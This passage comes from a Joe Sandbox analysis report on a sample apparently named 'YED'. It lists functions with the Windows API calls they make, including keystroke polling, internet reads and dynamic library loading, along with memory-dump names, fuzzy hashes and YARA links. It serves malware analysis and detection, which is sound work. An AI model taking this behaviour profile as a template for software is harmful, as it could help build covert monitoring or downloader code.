Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 76a802d2c25cf17cc85ed7686bd2141c9bc14c7df58e651c0321e5a1df88f7a3
Instruction ID: 1d8e567bd9d110d4d971ff7fd3e820ecbf959a08882549711067b6c0dcb098df
Opcode Fuzzy Hash: 76a802d2c25cf17cc85ed7686bd2141c9bc14c7df58e651c0321e5a1df88f7a3
Instruction Fuzzy Hash: F5D012356226235756222F25BC1CDCB6A58AF87B553150625F90DA2114CF61CD6285E0

Uniqueness

Uniqueness Score: -1.00%

Function 02A5A3F9 Relevance: 7.9, APIs: 5, Instructions: 418COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A5A598
_wcslen.LIBCMT ref: 02A5A600
_wcslen.LIBCMT ref: 02A5A732
_wcslen.LIBCMT ref: 02A5A74B
_wcslen.LIBCMT ref: 02A5A766

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
Instruction ID: 6f36dd869536fcdf7bc4c539c5e55c53a2745d4554481fc07a96ab0b3ac48542
Opcode Fuzzy Hash: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
Instruction Fuzzy Hash: EBF19D71604350DFCB15EF24C890B6BBBE6AF85314F14855DE88A9B2A2CF35E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0029A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0029A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0029A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0029A468
CloseHandle.KERNEL32(?), ref: 0029A63D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 967e17b2c34a78c5ab1cefff40f3fc87f1c290cc8012121f80f273771145613d
Instruction ID: 8f0f66ea4312631610b874e08fd3d766df43a059dd4cd14172bf4ed908976cb7
Opcode Fuzzy Hash: 967e17b2c34a78c5ab1cefff40f3fc87f1c290cc8012121f80f273771145613d
Instruction Fuzzy Hash: DFA1EF71614301AFDB20DF24D886F2AB7E5AF94714F14881DF95A8B292DBB0EC51CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0027E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0027CF22,?), ref: 0027DDFD

Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0027CF22,?), ref: 0027DE16

Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A

lstrcmpiW.KERNEL32(?,?), ref: 0027E473
MoveFileW.KERNEL32 ref: 0027E4AC
_wcslen.LIBCMT ref: 0027E5EB
_wcslen.LIBCMT ref: 0027E603
SHFileOperationW.SHELL32 ref: 0027E650

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f3fee149f60ddbb7c3e2be95bba574eb934ff533921122402830eb7b188f5359
Instruction ID: 1aa3ed9c92586497552eca3050d7fdf9eb7214069f16eba93ff257d2b0fed117
Opcode Fuzzy Hash: f3fee149f60ddbb7c3e2be95bba574eb934ff533921122402830eb7b188f5359
Instruction Fuzzy Hash: 5F51B4B20183855BCB24EB90D8919DB73ECAF99340F00495EF68DD3151EF74A5988B66

Uniqueness

Uniqueness Score: -1.00%

Function 00278BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00278BCD
VariantClear.OLEAUT32 ref: 00278C3E
VariantClear.OLEAUT32 ref: 00278C9D
VariantClear.OLEAUT32(?), ref: 00278D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00278D3B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 52c9453ace9235e982a950333c9e91cd61cbf45185997dc1acbe4256a833f3c4
Instruction ID: ba61e6245641293833b4869eebade152cc1714420b51739129f0074341471bf6
Opcode Fuzzy Hash: 52c9453ace9235e982a950333c9e91cd61cbf45185997dc1acbe4256a833f3c4
Instruction Fuzzy Hash: 61515DB5A10219DFCB14CF68D894AAAB7F8FF8D314B158559E909DB350E730E911CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00288AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00288BAE
GetPrivateProfileSectionW.KERNEL32 ref: 00288BDA
WritePrivateProfileSectionW.KERNEL32 ref: 00288C32
WritePrivateProfileStringW.KERNEL32 ref: 00288C57
WritePrivateProfileStringW.KERNEL32 ref: 00288C5F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c8fb7719e3b9fdaebe1eac1be533835f702e5319c982a0ac04868afc5913089a
Instruction ID: 3f1fde07f9c4812a01ee5f06258bbd099f9683cf120db08e8d1608364a9ff249
Opcode Fuzzy Hash: c8fb7719e3b9fdaebe1eac1be533835f702e5319c982a0ac04868afc5913089a
Instruction Fuzzy Hash: 2E514E35A10215AFCB05DF64C885AADBBF5FF49314F088459E849AB3A2DB31ED61CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00298EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00298F40
GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00298FD0
GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00298FEC
GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00299032
FreeLibrary.KERNEL32(00000000), ref: 00299052

Part of subcall function 0022F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00281043,?,759D3F18), ref: 0022F6E6
Part of subcall function 0022F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0026FA64,00000000,00000000,?,?,00281043,?,759D3F18,?,0026FA64), ref: 0022F70D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 07e6a884821397914c84b33aaae798c236af57f7e4814e47f57b75cdf597310e
Instruction ID: 5b4307128e6a99bb442c284cd52c79ff7aa61fe4d91bb70043e0aeac16515d31
Opcode Fuzzy Hash: 07e6a884821397914c84b33aaae798c236af57f7e4814e47f57b75cdf597310e
Instruction Fuzzy Hash: 5E515B35610205DFCB11DF68C4948ADBBF1FF5A324B5880A8E81A9B762DB31ED95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 002A6C33
SetWindowLongW.USER32 ref: 002A6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002A6C73
ShowWindow.USER32(00000002,00000000), ref: 002A6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 002A6CC7

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: f96bed69b2e56ccfa89010ba9aee5c3c6930fc7a75293b3e6b57b8adbfdfdefb
Instruction ID: ce8466677383db4ccf8e155ffba0e8b0b61179052ce63b58a1c67a57a7fa8648
Opcode Fuzzy Hash: f96bed69b2e56ccfa89010ba9aee5c3c6930fc7a75293b3e6b57b8adbfdfdefb
Instruction Fuzzy Hash: 3341E735624105AFD724DF38CC5CFA9BBA6EB0B360F190225F955A72E1CB71ED60CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00242051 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002420C3
_free.LIBCMT ref: 002420E3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c2948e1ced0882d3679e8f30fe6942413e464ec0a6ade07c66093e3cbbb51092
Instruction ID: 6e627c1a2a9af69141de62b5aec230f183d7c6c3fa548bf440a0bdffb6b21062
Opcode Fuzzy Hash: c2948e1ced0882d3679e8f30fe6942413e464ec0a6ade07c66093e3cbbb51092
Instruction Fuzzy Hash: 3D41F132A10200EFCB28DF79C880A5EB3F5EF88310F6541A9F509EB352DA31AD15CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0022912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00229141
ScreenToClient.USER32(00000000,?), ref: 0022915E
GetAsyncKeyState.USER32 ref: 00229183
GetAsyncKeyState.USER32 ref: 0022919D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8e5a0b76d9d5a8368e78c8abcb40e90f4f7deb9cd842d0d8775a3ab2549aff40
Instruction ID: 96e44988e3f75519fe78b96f990a56ef55bd75b69345016cd6c0546d84b83c29
Opcode Fuzzy Hash: 8e5a0b76d9d5a8368e78c8abcb40e90f4f7deb9cd842d0d8775a3ab2549aff40
Instruction Fuzzy Hash: BE41903191821BFBDF059FA8D848BEEB775FB06324F204256E429A32D0CB7059A4CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00283874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002838CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00283922
TranslateMessage.USER32(?), ref: 0028394B
DispatchMessageW.USER32(?), ref: 00283955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00283966

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: e24e684744892cb999e68bc9a394e1d636497ce5737135654e2b62d411632786
Instruction ID: 445193d6009bdc5612054cb8405abb5b6d656b68e2a5d76f18d63b1b857bab64
Opcode Fuzzy Hash: e24e684744892cb999e68bc9a394e1d636497ce5737135654e2b62d411632786
Instruction Fuzzy Hash: A831F778966383DFEB35EF34E84CBB637A8AB01700F140469E466860E0E7F496A5CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0028CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0028CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0028CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0028C21E,00000000), ref: 0028CFF2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 636d9bdd900d074fd89e1b12ca301f03f1c3593022c4d54dc3a0bbfab5f09728
Instruction ID: 8bee132f0aec724fd96ab2dc32485261586e8525289ff80af5cdcb6e593679ad
Opcode Fuzzy Hash: 636d9bdd900d074fd89e1b12ca301f03f1c3593022c4d54dc3a0bbfab5f09728
Instruction Fuzzy Hash: B2318475521206EFEB20EFA5D88496BB7F9EB14310B20442FF606D2591DB30AD50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 002A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 002A5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 002A579D
_wcslen.LIBCMT ref: 002A57AF
_wcslen.LIBCMT ref: 002A57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 002A5816

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 7d2196626f22d91489fd13a5873a4e9d1be37fcc2b5b603d2dd7441baa1e3f2d
Instruction ID: 6e97ff82a54e0c3b48f0c7c5fc408676ed53cd3fc54ac77f67eb45fa27b98a4c
Opcode Fuzzy Hash: 7d2196626f22d91489fd13a5873a4e9d1be37fcc2b5b603d2dd7441baa1e3f2d
Instruction Fuzzy Hash: 87218471924629DBDB209F60DC84AEFB778FF46720F104156F919AA180DB7099A5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00290930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00290951
GetForegroundWindow.USER32 ref: 00290968
GetDC.USER32(00000000), ref: 002909A4
GetPixel.GDI32(00000000,?,00000003), ref: 002909B0
ReleaseDC.USER32(00000000,00000003), ref: 002909E8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: dde3cceb775b0fdd3b8dac9908a1b2836a86040309bb03793c34c09a7dd6e740
Instruction ID: 32eaa1a38ba0c2a5404cc9df0273e8dc1cd871455207573934a303605534569e
Opcode Fuzzy Hash: dde3cceb775b0fdd3b8dac9908a1b2836a86040309bb03793c34c09a7dd6e740
Instruction Fuzzy Hash: 51219635610204AFD704EF65D988AAEB7F9EF45700F148469F84AD7751DB70AC54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0024CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0024CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024CDE9

Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0024CE0F
_free.LIBCMT ref: 0024CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024CE31

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 9f6f7be38fa7e18606590e32c71e033c3d4d3bca15dbd26f5a79f88e4f0fa05a
Instruction ID: 84093caec43fca8bdc12963d45ed8a24f52a7a485faa5fd1d9b7a057ab42cac6
Opcode Fuzzy Hash: 9f6f7be38fa7e18606590e32c71e033c3d4d3bca15dbd26f5a79f88e4f0fa05a
Instruction Fuzzy Hash: D501D8727132157F27651ABE6C4CC7B696DDEC7BA13350129F905CB200DF618D2195B0

Uniqueness

Uniqueness Score: -1.00%

Function 00229639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00229693
SelectObject.GDI32(?,00000000), ref: 002296A2
BeginPath.GDI32(?), ref: 002296B9
SelectObject.GDI32(?,00000000), ref: 002296E2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 83c12099358ec3482d5deb54cf5e7e53f2353f2609ab27d48e62a5cad9a29c9b
Instruction ID: c267d2883f1ac15930189639d360ae584832dd4a21ca7b77b3e1dc95c8322211
Opcode Fuzzy Hash: 83c12099358ec3482d5deb54cf5e7e53f2353f2609ab27d48e62a5cad9a29c9b
Instruction Fuzzy Hash: D2217130861396EBDB119FA4FC4CBB97BA8BB01315F100225F414AA1A1D77498F5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00275711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00275726
_memcmp.LIBVCRUNTIME ref: 00275744
_memcmp.LIBVCRUNTIME ref: 00275757
_memcmp.LIBVCRUNTIME ref: 0027576F
_memcmp.LIBVCRUNTIME ref: 00275787

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 77e8281120af5704fc75e4084abf6f9b8945f6ea3de1ba7eef0bec8a6027bd13
Instruction ID: 262b11b05f268d0f2b73d680df856a140468fe6dc1dfe334846d8b8d8a2b0d42
Opcode Fuzzy Hash: 77e8281120af5704fc75e4084abf6f9b8945f6ea3de1ba7eef0bec8a6027bd13
